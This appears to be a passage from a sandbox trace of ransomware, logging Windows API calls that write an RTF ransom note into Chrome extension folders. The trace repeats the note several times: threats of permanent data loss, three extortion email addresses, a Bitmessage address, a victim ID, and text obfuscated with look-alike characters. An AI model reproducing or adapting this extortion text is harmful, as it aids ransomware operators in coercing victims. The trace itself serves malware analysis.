middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0278.573] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x1ef5068, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\nzráb\x95.ê©ÀAH\x01¹HÂP[w.\x80¬Ñ%cD", lpUsedDefaultChar=0x0) returned 8717 [0278.573] WriteFile (in: hFile=0x2c8, lpBuffer=0x1ef5068*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x1ef5068*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0278.574] CloseHandle (hObject=0x2c8) returned 1 [0278.574] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\bg\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\bg\\#readme_eman#.rtf")) returned 0xffffffff [0278.574] GetLastError () returned 0x2 [0278.574] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\bg\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\bg\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2c8 [0278.575] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 